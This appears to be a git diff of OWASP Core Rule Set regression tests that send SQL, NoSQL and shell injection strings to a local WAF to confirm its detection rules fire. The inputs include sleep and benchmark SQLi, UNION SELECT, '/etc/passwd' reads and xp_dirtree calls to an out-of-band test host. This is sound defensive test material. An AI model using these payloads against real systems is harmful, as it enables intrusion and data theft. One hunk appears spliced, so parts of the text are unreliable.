input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=BeNChMaRK(1000000, md5 AND 9796=4706('')" - version: HTTP/1.0 - output: - log_contains: id "942160" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=BeNChMaRK(1000000, md5 AND 9796=4706('')" + version: HTTP/1.0 + output: + log_contains: id "942160" + - test_title: 942160-10 + desc: "Detect blind SQLi attack in REQUEST_BASENAME. Issue #1904" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/if(now()=sysdate(),sleep(12),0)" + version: HTTP/1.0 + output: + log_contains: id "942160" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml new file mode 100644 index 0000000000..c3f0f366bf --- /dev/null +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml @@ -0,0 +1,71 @@ +--- +meta: + author: "Franziska Bühler" + description: None + enabled: true + name: 942170.yaml +tests: + - test_title: 942170-1 + desc: "Detects SQL benchmark and sleep injection attempts including conditional queries: 'SELECT BENCHMARK(1000000,1+1);'" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?var=SELECT%20BENCHMARK%281000000%2C1%2B1%29%3B" + version: HTTP/1.0 + output: + log_contains: id "942170" + - test_title: 942170-2 + desc: "Detects SQL benchmark and sleep injection attempts including conditional queries: '; sleep(0)'" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?var=%3B%20sleep%280%29" + version: HTTP/1.0 + output: + log_contains: id "942170" + - test_title: 942170-3 + desc: "Detects SQL benchmark and sleep injection attempts including conditional queries: negative test" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?var=I%20sleep%20well%21" + version: HTTP/1.0 + output: + no_log_contains: id "942170" + - test_title: 942170-4 + desc: "Status Page Test - SQL injection test with select if(x" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?test=select+if(x" + version: HTTP/1.0 + output: + log_contains: id "942170" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml index 0ccec158aa..7dbbf80027 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml @@ -1,41 +1,137 @@ --- - meta: - author: "Christian S.J. Peron" - description: None - enabled: true - name: 942180.yaml - tests: - - - test_title: 942180-1 +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 942180.yaml +tests: + - test_title: 942180-1 desc: "basic SQL authentication bypass" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: GET - port: 80 - # something simple like 3' ' 1 - uri: "/?var=3%27%20%27%201" - version: HTTP/1.0 - output: - log_contains: id "942180" - - - test_title: 942180-2 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # something simple like 3' ' 1 + uri: "/?var=3%27%20%27%201" + version: HTTP/1.0 + output: + log_contains: id "942180" + - test_title: 942180-2 desc: "XSS test based on portswigger XSS cheatsheet" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - version: HTTP/1.0 - data: "javascript:\"/*'/*`/*--> 5'" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?var=%20HAVING%20COUNT%28CustomerID%29%20%3E%205" + version: HTTP/1.0 + output: + log_contains: id "942251" + - test_title: 942251-2 + desc: "Detects having injections negative test" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?var=having%20fun" + version: HTTP/1.0 + output: + no_log_contains: id "942251" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942260.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942260.yaml index bfe986e552..0c440ab6f5 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942260.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942260.yaml @@ -1,381 +1,24 @@ --- - meta: - author: "Christian S.J. Peron, Christian Folini" - description: None - enabled: true - name: 942260.yaml - tests: - - - test_title: 942260-1 +meta: + author: "Christian S.J. Peron, Christian Folini" + description: None + enabled: true + name: 942260.yaml +tests: + - test_title: 942260-1 desc: "Basic SQL authentication bypass" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: GET - port: 80 - # something LIKE ' - uri: "/?var=something%20LIKE%20%27" - version: HTTP/1.0 - output: - log_contains: id "942260" - - - test_title: 942260-2 - desc: "Basic SQL authentication bypass" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=0.3480567293179807' UNION ALL select NULL --" - version: HTTP/1.0 - output: - log_contains: id "942260" - - - test_title: 942260-3 - desc: "Basic SQL authentication bypass" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=config.ini\x22) UNION ALL select NULL --" - version: HTTP/1.0 - output: - log_contains: id "942260" - - - test_title: 942260-4 - desc: "Basic SQL authentication bypass" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=CRS) UNION ALL select NULL --" - version: HTTP/1.0 - output: - log_contains: id "942260" - - - test_title: 942260-5 - desc: "Basic SQL authentication bypass" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=CRS3\x22) UNION ALL select NULL --" - version: HTTP/1.0 - output: - log_contains: id "942260" - - - test_title: 942260-6 - desc: "Advanced SQL authentication bypass" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=abcd'||(select extractvalue(xmltype('%ptkjp;" - version: HTTP/1.0 - output: - log_contains: id "942260" - - - test_title: 942260-7 - desc: "Embedded shell execution" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=` /bin/cat /etc/passwd`" - version: HTTP/1.0 - output: - log_contains: id "942260" - - - test_title: 942260-8 - desc: "Embedded shell execution" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=0.84622338492032948`echo${IFS}crs312``echo${IFS}34test`" - version: HTTP/1.0 - output: - log_contains: id "942260" - - - test_title: 942260-9 - desc: "Embedded shell execution" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=`echo crs312``echo 34test`" - version: HTTP/1.0 - output: - log_contains: id "942260" - - - test_title: 942260-10 - desc: "Embedded shell execution" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=123-456-01@coreruleset.org'|ping -c 1337 127.0.0.1 #" - version: HTTP/1.0 - output: - log_contains: id "942260" - - - test_title: 942260-11 - desc: "Advanced embedded shell execution" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=1);declare @q varchar(99);set @q='\x5c\x5cj0kwbatxjfgjp0qu3ibonwovamgmkq8h05unittests.corerule' 'set.org\x5ckph'; exec master.dbo.xp_dirtree @q;--" - version: HTTP/1.0 - output: - log_contains: id "942260" - - - test_title: 942260-12 - desc: "Advanced embedded shell execution" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=content.ini);declare @q varchar(99);set @q='\x5c\x5ci1kvc9uwkehiqzrt4hcnovpublhunittests.corerule' 'set.org\x5clri'; exec master.dbo.xp_dirtree @q;--" - version: HTTP/1.0 - output: - log_contains: id "942260" - - - test_title: 942260-13 - desc: "Advanced embedded shell execution" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=EmptyValue', '4', '2', '7');declare @q varchar(99);set @q='\x5c\x5ch5nug8yvodlhuyvs8ggmsuttfklkcjunittests.corerule'+'set.org\x5cvcr'; exec master.dbo.xp_dirtree @q;--" - version: HTTP/1.0 - output: - log_contains: id "942260" - - - test_title: 942260-14 - desc: "Advanced embedded shell execution" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=test));declare @q varchar(99);set @q='\x5c\x5czwzc7qpdfvczlgmazy74jckb62cunittests.corrule'+'set.org\x5cgej'; exec master.dbo.xp_dirtree @q;--" - version: HTTP/1.0 - output: - log_contains: id "942260" - - - test_title: 942260-15 - desc: "Advanced embedded shell execution" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=/config.ini' into outfile '\x5c\x5c\x5c\x5cil7vw9ew4e1iazbtohwn8v9uvl1hunitetests.coreruleset.org\x5c\x5cyxq'; --" - version: HTTP/1.0 - output: - log_contains: id "942260" - - - test_title: 942260-16 - desc: "Advanced embedded shell execution" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=EmptyValue into outfile '\x5c\x5c\x5c\x5cjviw6aoxefbjk0luyi6oiwjv5unittests.coreruleset.org\x5c\x5cxct'; --" - version: HTTP/1.0 - output: - log_contains: id "942260" - - - test_title: 942260-17 - desc: "Advanced embedded shell execution" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=test@coreruleset.org\x22|type %SYSTEMROOT%\x5cwin.ini" - version: HTTP/1.0 - output: - log_contains: id "942260" - - - test_title: 942260-18 - desc: "Traces of XSS" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=mytest>'>\x22>" - version: HTTP/1.0 - output: - log_contains: id "942260" - - - test_title: 942260-19 - desc: "Advanced SQL authentication bypass" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=\x22123-456-123@coreruleset.org\x22' and (select*from(select(sleep(10)))a)--" - version: HTTP/1.0 - output: - log_contains: id "942260" - - - test_title: 942260-20 - desc: "Advanced embedded shell execution" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=\x22tester@coreruleset.org\x22' waitfor delay'0:0:20'--" - version: HTTP/1.0 - output: - log_contains: id "942260" - - - test_title: 942260-21 - desc: "Advanced embedded shell execution" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=\x22-->'-->`-->" - version: HTTP/1.0 - output: - log_contains: id "942260" - - - test_title: 942260-22 - desc: "Traces of XSS" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var='\x22>" - version: HTTP/1.0 - output: - log_contains: id "942260" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # something LIKE ' + uri: "/?var=something%20LIKE%20%27" + version: HTTP/1.0 + output: + log_contains: id "942260" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942270.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942270.yaml index a7795f27f2..bf16aaec72 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942270.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942270.yaml @@ -1,23 +1,39 @@ --- - meta: - author: "Christian S.J. Peron" - description: None - enabled: true - name: 942270.yaml - tests: - - - test_title: 942270-1 +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 942270.yaml +tests: + - test_title: 942270-1 desc: "basic sql injection. Common attack string for mysql, oracle and others" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: GET - port: 80 - uri: "/?var=union%20select%20col%20from" - version: HTTP/1.0 - output: - log_contains: id "942270" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?var=union%20select%20col%20from" + version: HTTP/1.0 + output: + log_contains: id "942270" + - test_title: 942270-2 + desc: "Status Page Test - SQL injection test with Xunionselectfrom (missing word boundary at the beginning)" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?test=Xunionselectfrom" + version: HTTP/1.0 + output: + log_contains: id "942270" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942280.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942280.yaml index 38fb259074..c0f6bff5d3 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942280.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942280.yaml @@ -1,23 +1,40 @@ --- - meta: - author: "Christian S.J. Peron" - description: None - enabled: true - name: 942280.yaml - tests: - - - test_title: 942280-1 +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 942280.yaml +tests: + - test_title: 942280-1 desc: "Postgres pg_sleep injection, waitfor delay attacks and database shutdown attempts" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: GET - port: 80 - uri: "/?var=select%20pg_sleep" - version: HTTP/1.0 - output: - log_contains: id "942280" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?var=select%20pg_sleep" + version: HTTP/1.0 + output: + log_contains: id "942280" + - test_title: 942280-2 + desc: "SQL Server waitfor delay attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=\"tester@coreruleset.org\"' waitfor delay'0:0:20'--" + version: HTTP/1.0 + output: + log_contains: id "942280 diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942290.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942290.yaml index f1c2bab272..f93a3a0949 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942290.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942290.yaml @@ -1,39 +1,155 @@ --- - meta: - author: csanders-git - description: None - enabled: true - name: 942290.yaml - tests: - - - test_title: 942290-1 +meta: + author: csanders-git + description: None + enabled: true + name: 942290.yaml +tests: + - test_title: 942290-1 desc: Test as described in http://www.client9.com/article/five-interesting-injection-attacks/ stages: - - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: /mongo/show.php?u_id[$ne]=2 - headers: - User-Agent: ModSecurity CRS 3 Tests - Host: localhost - output: - log_contains: id "942290" - - - test_title: 942290-2 - desc: "basic MongoDB SQL injection attempts" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: GET - port: 80 - uri: "/?mongoQ=%5b%24lte%5dasdfsd" - version: HTTP/1.0 - output: - log_contains: id "942290" + - stage: + input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: /mongo/show.php?u_id[$ne]=2 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + output: + log_contains: id "942290" + - test_title: 942290-2 + desc: "basic MongoDB NOSQL injection attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?mongoQ=%5b%24lte%5dasdfsd" + version: HTTP/1.0 + output: + log_contains: id "942290" + - test_title: 942290-3 + desc: "basic MongoDB NOSQL injection attempts 2" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/mongo/show.php?u_id[$regex]=2" + version: HTTP/1.0 + output: + log_contains: id "942290" + - test_title: 942290-4 + desc: "basic MongoDB NOSQL injection attempts 3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/mongo/show.php?u_id[$regex]=2" + version: HTTP/1.0 + output: + log_contains: id "942290" + - test_title: 942290-5 + desc: "basic MongoDB NOSQL injection attempts 4" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"$not": "foo"}' + output: + log_contains: id "942290" + - test_title: 942290-6 + desc: "basic MongoDB NOSQL injection attempts 5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"$nor": "foo"}' + output: + log_contains: id "942290" + - test_title: 942290-7 + desc: "basic MongoDB NOSQL injection attempts 6" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"$where": "foo"}' + output: + log_contains: id "942290" + - test_title: 942290-8 + desc: "basic MongoDB NOSQL injection attempts 7" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"$elemMatch": "foo"}' + output: + log_contains: id "942290" + - test_title: 942290-9 + desc: "basic MongoDB NOSQL injection attempts 8" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"$text": "foo"}' + output: + log_contains: id "942290" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942300.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942300.yaml index f9e2d50485..383c0c4c77 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942300.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942300.yaml @@ -1,23 +1,55 @@ --- - meta: - author: "Christian S.J. Peron" - description: None - enabled: true - name: 942300.yaml - tests: - - - test_title: 942300-1 +meta: + author: "Christian S.J. Peron, Franziska Bühler" + description: None + enabled: true + name: 942300.yaml +tests: + - test_title: 942300-1 desc: "MySQL comments, conditions and ch(a)r injectionss" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - data: "var=) when 234 then&foo=bar" - version: HTTP/1.0 - output: - log_contains: id "942300" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=) when 234 then&foo=bar" + version: HTTP/1.0 + output: + log_contains: id "942300" + - test_title: 942300-2 + desc: "MySQL comments, conditions and ch(a)r injectionss" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=) when 234 then&foo=bar" + version: HTTP/1.0 + output: + log_contains: id "942300" + - test_title: 942300-3 + desc: "No false positives with for. Issue #2007" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=booked%20for%202021%28including%202020" + version: HTTP/1.0 + output: + no_log_contains: id "942300" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942310.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942310.yaml index 985e77836f..17ede05256 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942310.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942310.yaml @@ -1,23 +1,63 @@ --- - meta: - author: "Christian S.J. Peron" - description: None - enabled: true - name: 942310.yaml - tests: - - - test_title: 942310-1 - desc: "chained SQL injection attempts 2/2" +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 942310.yaml +tests: + - test_title: 942310-1 + desc: | + Chained SQL injection attempts 2/2. + This test originally checked the expression `[\"'`]\s+and\s*?=\W`. We opted to remove that expression as it + does not appear to match anything useful (https://github.com/coreruleset/coreruleset/issues/2118). + This test now checks that no match occurs for something that would have matched the original expression. stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: GET - port: 80 - uri: "/?var=%22%27%20and%20%3d%20bar" - version: HTTP/1.0 - output: - log_contains: id "942310" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?var=%22%27%20and%20%3d%20bar" + version: HTTP/1.0 + output: + no_log_contains: id "942310" + - test_title: 942310-2 + desc: | + Chained SQL injection attempts 2/2. + This test checks for a positive match of `\(\s*?select\s*?\w+\s*?\(`. + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?var='%20and%201%20in%20(select%20min(name)%20from%20sysobjects%20where%20xtype%20%3D%20'U'%20and%20name%20%3E%20'.')%20--" + version: HTTP/1.0 + output: + log_contains: id "942310" + - test_title: 942310-3 + desc: | + Chained SQL injection attempts 2/2. + This test checks for a positive match of `order\s+by\s+if\w*?\s*?\(`. + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?var=order%20by%20if(1%3D1%2C1%2Csleep(1))" + version: HTTP/1.0 + output: + log_contains: id "942310" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942320.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942320.yaml index 7fa85cd1ed..bb8be2c845 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942320.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942320.yaml @@ -1,74 +1,218 @@ --- - meta: - author: "Christian S.J. Peron, Christoph Hansen" - description: None - enabled: true - name: 942320.yaml - tests: - - - test_title: 942320-1 +meta: + author: "Christian S.J. Peron, Christoph Hansen" + description: None + enabled: true + name: 942320.yaml +tests: + - test_title: 942320-1 desc: "Detects MySQL and PostgreSQL stored procedure/function injections" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - data: "var=procedure%20analyse%20%28" - version: HTTP/1.0 - output: - log_contains: id "942320" - - - test_title: 942320-2 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=procedure%20analyse%20%28" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_title: 942320-2 desc: "Detects MySQL and PostgreSQL stored procedure/function injections" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=exec+%28%40%0A" - version: HTTP/1.0 - output: - log_contains: id "942320" - - - test_title: 942320-3 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=exec+%28%40%0A" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_title: 942320-3 desc: "Detects MySQL and PostgreSQL stored procedure/function injections" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=declare+%40b%0A" - version: HTTP/1.0 - output: - log_contains: id "942320" - - - test_title: 942320-4 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=declare+%40b%0A" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_title: 942320-4 desc: "Detects MySQL and PostgreSQL stored procedure/function injections" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=DECLARE%2F%2A%2A%2F%40x%0A" - version: HTTP/1.0 - output: - log_contains: id "942320" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=DECLARE%2F%2A%2A%2F%40x%0A" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_title: 942320-5 + desc: "Detects PostgreSQL data conversion with ::int" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: 